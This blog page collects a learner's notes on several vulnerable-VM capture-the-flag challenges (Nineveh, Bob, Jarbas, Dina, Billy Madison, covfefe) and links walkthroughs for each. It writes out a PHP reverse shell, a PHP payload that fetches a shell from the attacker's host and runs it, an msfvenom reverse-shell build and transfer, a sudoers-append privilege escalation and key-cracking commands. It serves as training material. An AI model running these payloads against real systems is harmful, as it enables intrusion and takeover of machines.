
Posts

Showing posts from September, 2018

48 VM HTB Nineveh

Walkthru: A. https://v3ded.github.io/ctf/htb-nineveh.html [hydra brute force www, searchsploit phpLiteAdmin 1.9, hydra brute force https where the username is irrelevant but is required to complete the command, php reverse shell, create a database and a table in phpLiteAdmin, directory traversal, chkrootkit privilege escalation bug, port knocking, strings to extract key from png file]
Notes: Unable to test it since the VM had static IP. Read Walkthru.
Make our own .txt backdoor file inside /var/www/html with <?php $sock=fsockopen("YOUR IP",1234);exec("/bin/sh -i <&3 >&3 2>&3");?> as the content.
Change Database and add a table inside called shell, select 1 field: name the field whatever we wish, set it as text type, put <?php system("wget YOURIP/shell.txt -O /tmp/shell.php; php /tmp/shell.php"); ?> into the default value & click create. This should create a new table with our exploit. The default

47 VM Bob 1.0.1

Walkthru: A. http://www.hackingarticles.in/hack-the-bob-1-0-1-vm-ctf-challenge/ [webshell, robots.txt, reverse shell, combining two OS commands using && and ||, hidden content/information, spawning a python shell, ssh on non-default port, search for txt file, password in text file, gpg file where the key is the first letter of each line of a file]
B. https://dangwasec.wordpress.com/2018/03/20/ctf-bob-1-0-1-walkthrough/ [burp]
C. https://hackso.me/bob-1.0.1-walkthrough/ [PGPCrack-NG is a program designed to brute-force symmetrically encrypted PGP files; not useful here]
Notes: file notes.sh
#!/bin/bash
clear
echo "-= Notes =-"
echo "Harry Potter is my faviorite"
echo "Are you the real me?"
echo "Right, I'm ordering pizza this is going nowhere"
echo "People just don't get me"
echo "Ohhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh <sea santy here>"
echo "Cucumber"
echo "Rest now your eyes are slee

45 VM : CTF: Jarbas 1

Notes: https://d7x.promiselabs.net/2018/07/26/ctf-jarbas-1-vulnhub-ctf-walkthrough/ [website linked to external website, jenkins, dirb using -x option to search for html and php files, unhash pwd, run shell via jenkins web app, msfvenom code base64 encode/decode, privilege escalation by adding the user to the sudoers file]
Walkthru: Reverse shell steps...
1. msfvenom -a x64 -p linux/x64/shell_reverse_tcp lhost=192.168.117.4 lport=443 -e x86/shikata_ga_nai -f elf -b '\x00' > shell.bin
2. cat shell.bin | base64
3. echo "replace_it_with_the_content_of_the_shell.bin" | base64 -d > /tmp/shell.bin
   chmod +x /tmp/shell.bin
   /tmp/shell.bin
echo "echo 'jenkins ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers" >> /etc/script/CleaningScript.sh → where CleaningScript.sh is the file that runs via the crontab

40 VM : Dina 1.0.1

Walkthru: A. http://touhidshaikh.com/blog/?p=475 [zip2john, burp proxy change user agent vulnerability, php reverse shell]
Notes: This VM also has another vulnerability https://www.exploit-db.com/exploits/42003/ which I was able to use to run the uname -a and id commands in the filename but couldn't do anything beyond that. Unable to run reverse shell.
A. Imported the file successfully but do not see any output when the command is run via the user agent field. No output is shown.

41 VM : Billy Madison 1.0

Walkthru: A. https://g0blin.co.uk/billy-madison-1-vulnhub-writeup/ [wordpress running on tcp 69, wpscan, Caesar cipher tool with a rotation of 13, dirsearch, smbclient, sending email using swaks, aircrack, suid, running binary file as root and adding user to sudoers, smtpd port 2525, email to backdoor, mapping a shared folder with smbclient]
B. http://www.hackingarticles.in/hack-billy-madison-vm-ctf-challenge/ [wireshark pcap follow TCP stream, dirbuster, hydra brute force ftp]
C. https://steemit.com/walkthrough/@shifty0g/billy-madison-1-0-walkthrough [port knocking, dirb]
Notes: Had problems with getting the ftp port open. It kept on showing filtered. Telnet also was switching between filtered and open. After I fixed the loop with the host timeout option, it worked. Based on the port knocking link, the nmap script needed to be run in a specific format.

42 VM : covfefe: 1

Walkthru: A. https://cowsayroot.com/walkthrough-covfefe/ [to crack passphrase from SSH private key, mini buffer overflow, buf[20], adding /bin/bash after 20 characters]
Notes: http://www.cables.ws/cracking-rsa-private-key-passphrase-with-john-the-ripper/ [to crack passphrase from SSH private key]
1. Here is an example of what an SSH private key looks like.
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,AEB88C140F69BF2074788DE24AE48D46

DbPrO78kegNuk1DAqlAN5jbjXv0PPsog3jdbMFS8iE9p3UOL0lF0xf7PzmrkDa8R
5y/b46+9nEpCMfTPhNuJRcW2U2gJcOFH+9RJDBC5UJMUS1/gjB/7/My00Mwx+aI6
........
RUgZkbMQZNIIfzj1QuilRVBm/F76Y/YMrmnM9k/1xSGIskwCUQ+95CGHJE8MkhD3
-----END RSA PRIVATE KEY-----
2. In this case create the public/private key pair with a predictable password: /usr/sbin/ssh2john ~/.ssh/id_rsa > id_rsa.hash
3. Next, all you need to do is point John the Ripper to the given file, with your dictionary: /usr/sbin/john --wordlist=/usr/share/wordlists/rockyou.txt id